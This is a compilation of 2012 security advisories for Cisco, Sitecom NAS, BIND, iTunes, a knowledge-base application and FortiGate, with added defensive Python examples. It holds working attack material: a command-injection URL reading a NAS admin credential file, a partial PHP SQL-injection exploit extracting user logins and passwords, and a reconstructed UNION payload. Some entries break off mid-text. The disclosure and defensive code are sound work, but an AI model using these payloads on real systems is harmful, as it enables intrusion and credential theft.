Cisco Security Advisory: Cisco ASA-CX and Cisco PRSM Log Retention Denial of Service Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Cisco Security Advisory: Cisco ASA-CX and Cisco PRSM Log Retention Denial of Service Vulnerability

Advisory ID: cisco-sa-20120912-asacx

Revision 1.0

For Public Release 2012 September 12 16:00 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Cisco ASA-CX Context-Aware Security appliance and Cisco Prime Security Manager (PRSM) contain a denial of service (DoS) vulnerability in versions prior to 9.0.2-103.

Successful exploitation of this vulnerability on the Cisco ASA-CX could cause the device to stop processing user traffic and prevent management access to the Cisco ASA-CX.

Successful exploitation of this vulnerability on the Cisco PRSM could cause the software to become unresponsive and unavailable.

There are no workarounds for this vulnerability, but some mitigations are available.

Cisco has released free software updates that address this vulnerability.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120912-asacx

-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)
Comment: GPGTools - http://gpgtools.org

iF4EAREIAAYFAlBQmfIACgkQUddfH3/BbTqiYwD/XvyTOxUAsm5SUk6SQz2gSvJQ
MRJ/YAAaW54eH5HykGwA/j19RyMKO9JLs5Hj+E6lDsbVjl4azUf2XkBI+Zt/jS+B
=eNJC
-----END PGP SIGNATURE-----
Cisco Security Advisory: Cisco Unified Presence and Jabber Extensible Communications Platform Stream Header Denial of Service Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Cisco Security Advisory: Cisco Unified Presence and Jabber Extensible Communications Platform Stream Header Denial of Service Vulnerability

Advisory ID: cisco-sa-20120912-cupxcp

Revision 1.0

For Public Release 2012 September 12 16:00 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

A denial of service (DoS) vulnerability exists in Cisco Unified Presence and Jabber Extensible Communications Platform (Jabber XCP). An unauthenticated, remote attacker could exploit this vulnerability by sending a specially crafted Extensible Messaging and Presence Protocol (XMPP) stream header to an affected server. Successful exploitation of this vulnerability could cause the Connection Manager process to crash. Repeated exploitation could result in a sustained DoS condition.

There are no workarounds available to mitigate exploitation of this vulnerability.

Cisco has released free software updates that address this vulnerability.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120912-cupxcp

-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)
Comment: GPGTools - http://gpgtools.org

iF4EAREIAAYFAlBQmfoACgkQUddfH3/BbTr41QEAiEtU1YJmRk9YpE1gC5mlqWDN
nfdqWNCjaeDKfgnJjYYA/jqFNpCPCHjUL4Oon847zNnduIW2CY9SBrWc9g2iYLNL
=qvOa
-----END PGP SIGNATURE-----
Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center
Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center

Severity Rating:     High
Discovery Date:      July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date:     September 11, 2012

Vulnerability Type
==================
Arbitrary file upload

Impact
======
Loss of system integrity

Severity
========
Alcyon rates the severity of this vulnerability as high due to the following properties:
- Ease of exploitation;
- No authentication credentials required;
- No knowledge about individual victims required;
- No interaction with the victim required.

Products and firmware versions affected
=======================================
- Sitecom MD-253 firmware version up to and including 2.4.17
- Sitecom MD-254 firmware version up to and including 2.4.17
- Possibly other rebranded Mapower network storage products

Risk Assessment
===============
An attacker can upload arbitrary files to the device. Combined with the command injection vulnerability described in advisory AA-008, this allows an attacker to obtain a remote root shell.

Vulnerability
=============
The CGI executable that is responsible for handling firmware updates allows arbitrary files to be uploaded to the /tmp folder. Furthermore, the uploaded files are automatically assigned execute permissions and are owned by root.

Proof of Concept Exploit
========================
PoC code exploiting this and other vulnerabilities to obtain an interactive root shell can be found here:
- http://www.alcyon.nl/blog/sitecom-poc-exploit

Risk Mitigation
===============
At the time of disclosure no updated firmware version was available. We recommend that you limit access to the web management UI of the device by utilizing proper packet filtering and/or NAT on your router in order to limit network access to your NAS. Note that this will not completely eliminate the risk of exploitation, since the product is affected by other vulnerabilities that can be leveraged using client side attacks.

Vendor responses
================
None

Fixed Versions
==============
There is currently no vendor patch available. A third party solution is available on:
- http://www.alcyon.nl/blog/sitecom-nas-md-253-and-md-254-risk-mitigation/

Latest version of this advisory
===============================
- http://www.alcyon.nl/advisories/aa-007

References
==========
Security Advisory AA-008: Command Injection Vulnerability in Sitecom Home Storage Center
- http://www.alcyon.nl/advisories/aa-008
Security Advisory AA-008: Command Injection Vulnerability in Sitecom Home Storage Center
Security Advisory AA-008: Command Injection Vulnerability in Sitecom Home Storage Center

Severity Rating:     High
Discovery Date:      July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date:     September 12, 2012

Vulnerability Type
==================
Command injection

Impact
======
System access

Severity
========
Alcyon rates the severity of this vulnerability as high due to the following properties:
- Ease of exploitation;
- No authentication credentials required;
- No knowledge about individual victims required;
- No interaction with the victim required.

Products and firmware versions affected
=======================================
- Sitecom MD-253 firmware version up to and including 2.4.17
- Sitecom MD-254 firmware version up to and including 2.4.17
- Possibly other rebranded Mapower network storage products

Risk Assessment
===============
An attacker can execute commands as the root user. This allows for the download and execution of arbitrary binaries and shell scripts to gain complete control over the device.

Vulnerability
=============
The installer.cgi script allows commands to be injected. One limitation is that commands can only consist of characters that are not subject to URL-encoding. However, the hexadecimal representation of the space character (%20) is converted to a space.

Proof of Concept Exploit
========================
Paste the following line into a browser address bar to display the device's admin credentials:

http://victimIP/cgi-bin/installer.cgi?SetExecTablecat%20/etc/sysconfig/config/webmaster.conf

PoC code exploiting this and other vulnerabilities to obtain an interactive root shell can be found here:
- http://www.alcyon.nl/blog/sitecom-poc-exploit

Risk Mitigation
===============
At the time of disclosure no updated firmware version was available. We recommend that you limit access to the web management UI of the device by utilizing proper packet filtering and/or NAT on your router in order to limit network access to your NAS. Note that this will not completely eliminate the risk of exploitation, since the product is affected by other vulnerabilities that can be leveraged using client side attacks.

Vendor responses
================
None

Fixed Versions
==============
There is currently no vendor patch available. A third party solution is available on:
- http://www.alcyon.nl/blog/sitecom-nas-md-253-and-md-254-risk-mitigation/

Latest version of this advisory
===============================
- http://www.alcyon.nl/advisories/aa-008

References
==========
Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center
- http://www.alcyon.nl/advisories/aa-007
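The two Alcyon advisories above share one interim mitigation (keep the NAS web UI reachable only from the LAN), and the second one explains how the injected command passes through installer.cgi (only characters that survive URL-encoding, with %20 turned back into a space). The script below is an added example, not part of the Alcyon advisories or of the Sitecom firmware: it reads a web-server access log and flags (a) any hit on the management UI from outside an assumed LAN range, which means the recommended router-side filtering is not in place, and (b) installer.cgi requests whose SetExecTable value decodes to a command containing spaces or shell metacharacters. The log format, the LAN range 192.168.1.0/24 and the sample lines are all constructed.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Assumption: the NAS lives in this LAN range and its web UI should only be
# reached from here (the router filtering / NAT the advisories recommend).
ALLOWED_MGMT_NETS = [ipaddress.ip_network("192.168.1.0/24")]

# Constructed "combined"-style access log line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Characters that only make sense in a query string if a shell is on the other end.
SHELL_META = re.compile(r'[;&|`$<>]')


def classify_request(line):
    """Return the list of findings for one access-log line; [] if clean, None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = []
    src = ipaddress.ip_address(m["src"])
    parts = urlsplit(m["target"])

    # (a) Mitigation check for AA-007 and AA-008: the whole web UI of the NAS is
    #     the management UI, so any request from outside the LAN is a finding.
    if not any(src in net for net in ALLOWED_MGMT_NETS):
        findings.append("web-ui-from-outside")

    # (b) Detection for AA-008: decode first, because %20 becoming a space is
    #     exactly the trick the advisory describes; then look for a SetExecTable
    #     value carrying a space or a shell metacharacter.
    if parts.path.endswith("/installer.cgi"):
        decoded = unquote(parts.query)
        if "SetExecTable" in decoded and (" " in decoded or SHELL_META.search(decoded)):
            findings.append("installer-cgi-command-injection")
    return findings


def scan_log(lines):
    """Return [(source ip, findings)] for every line with at least one finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        findings = classify_request(line)
        if m and findings:
            hits.append((m["src"], findings))
    return hits


# Constructed sample log: a normal LAN request, an external request carrying the
# advisory's PoC query, a LAN visit to the firmware page, and an external page hit.
SAMPLE_LOG = [
    '192.168.1.20 - - [12/Sep/2012:10:00:01 +0200] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Sep/2012:10:00:05 +0200] "GET /cgi-bin/installer.cgi?SetExecTablecat%20/etc/sysconfig/config/webmaster.conf HTTP/1.1" 200 88',
    '192.168.1.33 - - [12/Sep/2012:10:00:09 +0200] "GET /cgi-bin/installer.cgi HTTP/1.1" 200 2048',
    '198.51.100.9 - - [12/Sep/2012:10:00:12 +0200] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for src, findings in scan_log(SAMPLE_LOG):
        print(src, ", ".join(findings))
```

Run against the sample log, the external PoC request is reported twice over (outside the LAN and carrying an injected command), the external page hit is reported only as a mitigation failure, and both LAN requests are silent. Adjust ALLOWED_MGMT_NETS to the real LAN before using it on a live log.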
[SECURITY] [DSA 2547-1] bind9 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2547-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
September 12, 2012                     http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : bind9
Vulnerability  : improper assert
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-4244

It was discovered that BIND, a DNS server, does not handle DNS records properly which approach size limits inherent to the DNS protocol. An attacker could use crafted DNS records to crash the BIND server process, leading to a denial of service.

For the stable distribution (squeeze), this problem has been fixed in version 1:9.7.3.dfsg-1~squeeze7.

We recommend that you upgrade your bind9 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJQUO2GAAoJEL97/wQC1SS+73sH/1cqWEgYuMvKkTy+vW1DuTqd
LOp7YcqQsHWKBW1DbE1WUy09k5fGeNNu+UhFITUoiHjXZIBtVen0g1pHfxAy2g59
Fo2dpJhoushOC57+4Sf+UJbfYO3Uv1zSTYYyCdiG9Df4AFOFLLPZvxIcCnjM+fhy
DksM/U9T4fwgx+N3vb1EvTK3FZXkaniOuB7GNl5REfxMi/8vCSigsOOeWlPHcnuc
SGJnYmuLpfCp+iSqCUzotDGlEL/HBVUozLXSVEPaKwEpc5dj7s+zJSFBt+FQij25
d6RRa1fetnzEGQSbocnko9DjiGeidkQIcmlAvFLy6i9XIsmyg6Xu5gN4/4P6To8=
=O6mH
-----END PGP SIGNATURE-----
APPLE-SA-2012-09-12-1 iTunes 10.7
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2012-09-12-1 iTunes 10.7

iTunes 10.7 is now available and addresses the following:

WebKit
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution
Description:  Multiple memory corruption issues existed in WebKit. These issues are addressed through improved memory handling.
CVE-ID
CVE-2011-3016 : miaubiz
CVE-2011-3021 : Arthur Gerkis
CVE-2011-3027 : miaubiz
CVE-2011-3032 : Arthur Gerkis
CVE-2011-3034 : Arthur Gerkis
CVE-2011-3035 : wushi of team509 working with iDefense VCP, Arthur Gerkis
CVE-2011-3036 : miaubiz
CVE-2011-3037 : miaubiz
CVE-2011-3038 : miaubiz
CVE-2011-3039 : miaubiz
CVE-2011-3040 : miaubiz
CVE-2011-3041 : miaubiz
CVE-2011-3042 : miaubiz
CVE-2011-3043 : miaubiz
CVE-2011-3044 : Arthur Gerkis
CVE-2011-3050 : miaubiz
CVE-2011-3053 : miaubiz
CVE-2011-3059 : Arthur Gerkis
CVE-2011-3060 : miaubiz
CVE-2011-3064 : Atte Kettunen of OUSPG
CVE-2011-3068 : miaubiz
CVE-2011-3069 : miaubiz
CVE-2011-3071 : pa_kt working with HP's Zero Day Initiative
CVE-2011-3073 : Arthur Gerkis
CVE-2011-3074 : Slawomir Blazek
CVE-2011-3075 : miaubiz
CVE-2011-3076 : miaubiz
CVE-2011-3078 : Martin Barbella of the Google Chrome Security Team
CVE-2011-3081 : miaubiz
CVE-2011-3086 : Arthur Gerkis
CVE-2011-3089 : Skylined of the Google Chrome Security Team, miaubiz
CVE-2011-3090 : Arthur Gerkis
CVE-2011-3105 : miaubiz
CVE-2011-3913 : Arthur Gerkis
CVE-2011-3924 : Arthur Gerkis
CVE-2011-3926 : Arthur Gerkis
CVE-2011-3958 : miaubiz
CVE-2011-3966 : Aki Helin of OUSPG
CVE-2011-3968 : Arthur Gerkis
CVE-2011-3969 : Arthur Gerkis
CVE-2011-3971 : Arthur Gerkis
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-1520 : Martin Barbella of the Google Chrome Security Team using AddressSanitizer, Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP
CVE-2012-1521 : Skylined of the Google Chrome Security Team, Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP
CVE-2012-2817 : miaubiz
CVE-2012-2818 : miaubiz
CVE-2012-2829 : miaubiz
CVE-2012-2831 : miaubiz
CVE-2012-2842 : miaubiz
CVE-2012-2843 : miaubiz
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3593 : Apple Product Security
CVE-2012-3594 : miaubiz
CVE-2012-3595 : Martin Barbella of Google Chrome Security
CVE-2012-3596 : Skylined of the Google Chrome Security Team
CVE-2012-3597 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer
CVE-2012-3598 : Apple Product Security
CVE-2012-3599 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer
CVE-2012-3600 : David Levin of the Chromium development community
CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team using AddressSanitizer
CVE-2012-3602 : miaubiz
CVE-2012-3603 : Apple Product Security
CVE-2012-3604 : Skylined of the Google Chrome Security Team
CVE-2012-3605 : Cris Neckar of the Google Chrome Security team
CVE-2012-3606 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer
CVE-2012-3607 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer
CVE-2012-3608 : Skylined of the Google Chrome Security Team
CVE-2012-3609 : Skylined of the Google Chrome Security Team
CVE-2012-3610 : Skylined of the Google Chrome Security Team
CVE-2012-3611 : Apple Product Security
CVE-2012-3612 : Skylined of the Google Chrome Security Team
CVE-2012-3613 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer
CVE-2012-3614 : Yong Li of Research In Motion, Inc.
CVE-2012-3615 : Stephen Chenney of the Chromium development community
CVE-2012-3616 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer
CVE-2012-3617 : Apple Product Security
CVE-2012-3618 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer
CVE-2012-3620 : Abhishek Arya of Google Chrome Security Team
CVE-2012-3621 : Skylined of the Google Chrome Security Team
CVE-2012-3622 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer
CVE-2012-3623 : Skylined of the Google Chrome Security Team
CVE-2012-3624 : Skylined of the Google Chrome Security Team
CVE-2012-3625 : Skylined of Google Chrome Security Team
CVE-2012-3626 : Apple Product Security
CVE-2012-3627 : Skylined and Abhishek Arya of Google Chrome Security team
CVE-2012-3628 : Apple Product Security
CVE-2012-3629 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer
CVE-2012-3630 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer
CVE-2012-3631 : Abhishek Arya of Google Chrome Security Team using AddressSanitizer
CVE-2012-3632 : Abhishek Arya of the Google Chrome Security Team using AddressSanitizer
CVE-2012-3633 : Martin Barbella of Google Chrome Security Team using AddressSanitizer
CVE-2012-3634 : Martin
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability
Title:
======
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability

Date:
=====
2012-09-11

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=702

VL-ID:
=====
702

Common Vulnerability Scoring System:
====================================
8.5

Introduction:
=============
Knowledge Base Software, by Novo Solutions can be used in a variety of in-house and external application settings. Our easy-to-use software is an ideal solution for small or large organizations who need a central repository to store information for Customer Support, Company Intranet, Employee Training, Document Management and more.

(copy from vendor website http://www.novosolutions.com/knowledge-base-software )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a critical SQL injection vulnerability in the Knowledge Base Enterprise Edition v4.62.0.

Report-Timeline:
================
2012-09-06: Researcher Notification & Coordination
2012-09-07: Vendor Notification
2012-00-00: Vendor Response/Feedback
2012-00-00: Vendor Fix/Patch
2012-00-00: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A SQL injection vulnerability and a misconfiguration were detected in Knowledge Base Enterprise Edition 4.62.0. The vulnerability allows a remote attacker, or a local low-privileged user account, to inject and execute their own SQL commands on the affected application's DBMS without user interaction. The vulnerability is located in the search module, when a request carrying the selcategory argument is processed and the category variable is used. Successful exploitation results in compromise of the MSSQL DBMS behind the ASP application.

Vulnerable File(s):
[+] doadvancedsearch.asp

Vulnerable Parameter(s):
[+] category

Condition
[+] selcategory - must be not NULL

Proof of Concept:
=================
The SQL injection vulnerability can be exploited by remote attackers without user interaction and without a privileged user account. For demonstration or reproduce ...

Note: In this report the injection sits inside a WHERE clause, which makes it somewhat harder to exploit: about 90% of the responses carry no usable output, only errors. To exploit this vulnerability we therefore use the MSSQL CAST or CONVERT functions, so that the result of our query is returned inside a conversion error message.

Query:  CAST(USER_LOGIN AS NVARCHAR(4000))
Result: [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'admin' to data type int.

In the proof of concept exploit we change and force the query to retrieve user credentials from the user table.

<?php
error_reporting(0);
/*
 * Software                Knowledge Base Enterprise Edition 4.62.00
 * Database                MS SQL
 * Description
 * Author                  Kami
 * Email                   k...@vulnerability-lab.com
 * Website                 http://www.kami.ma
 * vendor                  http://www.novosolutions.com/knowledge-base-software/
 * Exploitation-type       MSSQL error-based using .
 * Exploitation-technique  (CAST OR CONVERT) Via (WHERE or HAVING) clause.
 */

/* Define Target Informations */
$HOST = $argv[1];
$URI  = '/doadvancedsearch.asp';

/* DATABASE Params */
$TABLE   = 'USERS';
$columns = array('USER_LOGIN', 'USER_PASSWORD');
$evilSQL = '-6647) UNION ALL SELECT CHAR(107)+CHAR(97)+CHAR(109)+CHAR(105)+CHAR(58)+CHAR(58)+MAX(ISNULL(CAST({column_name} AS NVARCHAR(4000)),CHAR(32)))+CHAR(58)+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(105) FROM USERS where USER_ID=1 -- ';

$Exploit = new Exploitcore();
if ($argc > 1) {
    echo "\n" . '[+] Exploitation Start \\\ .--. /// (:::)(_)():- `--° \\\ Exploit sent/// ' . "\n";
    if (isset($argv[2])) $URI = $argv[2] . $URI;
    echo '[+] URL : ' . $argv[1] . $argv[2] . "\n";
    $n = 1;
    foreach ($columns as $column) {
        $evilSQL = '-6647) UNION ALL SELECT CHAR(107)+CHAR(97)+CHAR(109)+CHAR(105)+CHAR(58)+CHAR(58)+MAX(ISNULL(CAST({column_name} AS NVARCHAR(4000)),CHAR(32)))+CHAR(58)+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(105) FROM USERS where USER_ID=1 -- ';
        /* Substitute the column to read on this iteration */
        $evilSQL = str_replace('{column_name}', $column, $evilSQL);
        $Payload = array(
            'advsearchwords' => 'sds',
            'selcategory'    => '19',
            'category'       => $evilSQL,
            'operation'      => '%2B',
            'limit'          => '25',
            'searchtype'     => '1',
            'enableExclude'  => '1',
            'enableInclude'  => '1',
            'daterange'      => '0',
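To show the injection point the advisory describes, and the fix for it, the following is an added Python/SQLite example; it is not part of the advisory and not the code of the Novo Solutions product. It models a search function that pastes the category value into the WHERE clause only when selcategory is set (the advisory's "must be not NULL" condition), beside a parameterized version that also type-checks the id. The table layout, the query shape and the payload are constructed assumptions. SQLite has neither MSSQL's CHAR()-based string building nor its CAST conversion errors, so the payload simply selects the USERS row via UNION instead of leaking it through an error message.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE USERS (USER_ID INTEGER, USER_LOGIN TEXT, USER_PASSWORD TEXT);
        INSERT INTO USERS VALUES (1, 'admin', 'constructed-secret');
        CREATE TABLE ARTICLES (ARTICLE_ID INTEGER, TITLE TEXT, CATEGORY_ID INTEGER);
        INSERT INTO ARTICLES VALUES (10, 'Reset your password', 19);
        INSERT INTO ARTICLES VALUES (11, 'VPN setup', 20);
    """)
    return conn


def search_vulnerable(conn, words, selcategory, category):
    """Assumed shape of the flawed query: the category string is concatenated into
    the WHERE clause, but only when selcategory is non-empty."""
    sql = "SELECT TITLE FROM ARTICLES WHERE TITLE LIKE '%" + words + "%'"
    if selcategory:
        sql += " AND CATEGORY_ID IN (" + category + ")"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, words, selcategory, category):
    """Hardened version: the id must be numeric and every value is bound."""
    sql = "SELECT TITLE FROM ARTICLES WHERE TITLE LIKE ?"
    params = ["%" + words + "%"]
    if selcategory:
        if not category.isdigit():
            raise ValueError("category must be a numeric id")
        sql += " AND CATEGORY_ID = ?"
        params.append(int(category))
    return [row[0] for row in conn.execute(sql, params)]


# Constructed payload with the same structure as the advisory's: close the IN (...)
# list, UNION a row out of USERS, and comment out whatever the application appends.
INJECTED_CATEGORY = ("-6647) UNION ALL SELECT USER_LOGIN || '::' || USER_PASSWORD "
                     "FROM USERS WHERE USER_ID=1 -- ")


def demo():
    """Run legitimate and injected inputs through both query builders."""
    conn = make_db()
    out = {}
    out["legit_vulnerable"] = search_vulnerable(conn, "password", "19", "19")
    out["legit_hardened"] = search_parameterized(conn, "password", "19", "19")
    out["injected_vulnerable"] = search_vulnerable(conn, "sds", "19", INJECTED_CATEGORY)
    try:
        out["injected_hardened"] = search_parameterized(conn, "sds", "19", INJECTED_CATEGORY)
    except ValueError as exc:
        out["injected_hardened"] = "rejected: " + str(exc)
    # Same payload without selcategory: the category clause is never built,
    # which is why the advisory lists selcategory as a precondition.
    out["injected_no_selcategory"] = search_vulnerable(conn, "sds", "", INJECTED_CATEGORY)
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

Both builders return the same article for a normal search; for the injected value the concatenating builder hands back the USERS row, the parameterized one rejects the input before any SQL runs, and the same payload without selcategory does nothing because the vulnerable clause is never appended.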
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Title:
======
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

Date:
=====
2012-09-06

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=557

VL-ID:
=====
557

Common Vulnerability Scoring System:
====================================
5

Introduction:
=============
The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies.

Since 2009 the Fortigate appliance series has been certified by the U.S. Army and is now listed in the Information Assurance Approved Products List (IA APL). The military applies high security standards when securing outdoor camps, air bases and offices with Fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )

Abstract:
=========
Vulnerability-Lab Research Team discovered multiple persistent Web Vulnerabilities in the FortiGate UTM Appliance Application.

Report-Timeline:
================
2012-05-06: Researcher Notification & Coordination
2012-05-10: Vendor Notification
2012-06-11: Vendor Response/Feedback
2012-08-25: Vendor Fix/Patch (Fixed in FortiOS v4.3.8 B0537; Fixed in FortiOS v5.0)
2012-09-06: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Fortigate
Product: UTM Appliance Application - FortiGate-5000 Series; FortiGate-3950 Series; FortiGate-3810A

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities are detected in the FortiGate UTM Appliance Application. Remote attackers with low-privileged user accounts can inject their own persistent malicious script code to manipulate specific customer/admin requests. The vulnerability allows a local low-privileged attacker to manipulate the appliance (application) via persistent script code injection. The vulnerability is located in the Add and Tags modules (category listing), in the bound, vulnerable applied-tags display parameters. Successful exploitation results in content module request manipulation, execution of persistent malicious script code, session hijacking, account theft and persistent phishing.

Vulnerable Module(s): (Persistent)
[+] Tags - Applied tags
[+] Add - Tags Display Interface - UTM WAF Web Application [Appliance]

FortiGate-5000 Series; FortiGate-3950 Series; FortiGate-3810A; FortiGate-3600A; FortiGate-3016B; FortiGate-1240B
FortiGate-800; FortiGate-620B; FortiGate-311B; FortiGate-310B; FortiGate-300A; FortiGate-224B; FortiGate-200B Series

Proof of Concept:
=================
The persistent vulnerabilities can be exploited by remote attackers with low required user interaction or with a low-privileged user account. For demonstration or reproduce ...

Code Review: Tags - Applied tags [Box] Listing

URL: http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=#

<form name="addr_dlg" action="/firewall/address/add" onsubmit="if (!fwad_form_check('Please choose one address/group.', 'Please choose one interface to connect.')) return false; if (document.forms[0].submitFlag) return false; document.forms[0].submitFlag = true;">
<table><tbody><tr>
<td align="left" width="150"><nobr>Address Name</nobr></td>
<td align="left"><input name="name" size="64" maxlength="63" value="all" type="text"></td>
</tr>
<tr>
<td>Color</td>
<td><span colorclassprefix="addr_ipv6_" class="icon_fw addr_ipv6_13" id="addressIcon"></span>
<a href="#" id="addressColor" cscolorvalue="0">[Change]</a><input value="13" name="csColor1"
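For the persistent script injection above, the defensive counterpart is validation of the tag name on input plus output escaping that matches the HTML context the stored value lands in: the same tag appears as a text node in the listing and inside a value="..." attribute in the form, and each context needs its own escaping. The Python below is an added example, not FortiOS code; the allowlist pattern, the row template (modelled on the form fragment in the code review) and the sample tags are assumptions.

```python
import html
import re

# Assumed allowlist for a tag name; the 63-character cap mirrors the
# maxlength="63" on the address form in the code review.
TAG_RE = re.compile(r"^[A-Za-z0-9_. -]{1,63}$")


def validate_tag(tag):
    """Input-side check: accept plain tag names only, reject anything with markup."""
    return TAG_RE.match(tag) is not None


def render_tag_row(tag, escape=True):
    """Output-side defence: escape the stored tag separately for the text node and
    for the attribute value. escape=False reproduces the flawed behaviour so the
    two outputs can be compared."""
    if escape:
        text_ctx = html.escape(tag, quote=False)  # & < > are enough in a text node
        attr_ctx = html.escape(tag, quote=True)   # also " and ' so the attribute cannot be closed
    else:
        text_ctx = attr_ctx = tag
    return ('<tr><td align="left"><nobr>%s</nobr></td>'
            '<td align="left"><input name="name" size="64" maxlength="63" '
            'value="%s" type="text"></td></tr>' % (text_ctx, attr_ctx))


def render_tag_listing(tags, escape=True):
    """Render the whole applied-tags listing."""
    return "<table><tbody>" + "".join(render_tag_row(t, escape) for t in tags) + "</tbody></table>"


# Constructed stored tags: one ordinary, one carrying markup and a double quote,
# i.e. what a low-privileged user could have saved before validation was added.
STORED_TAGS = ["Guest WiFi", 'Lab "Net" <b>A</b>']

if __name__ == "__main__":
    for t in STORED_TAGS:
        print(repr(t), "valid" if validate_tag(t) else "rejected")
    print(render_tag_listing(STORED_TAGS))
```

With escaping on, the second tag is rendered as literal text in both places and the quote inside it can no longer terminate the value attribute; with escaping off, the stored markup is emitted as-is, which is the persistent condition the advisory reports. Validation on input catches the tag before it is stored, but output escaping is still needed for values that were stored before the check existed.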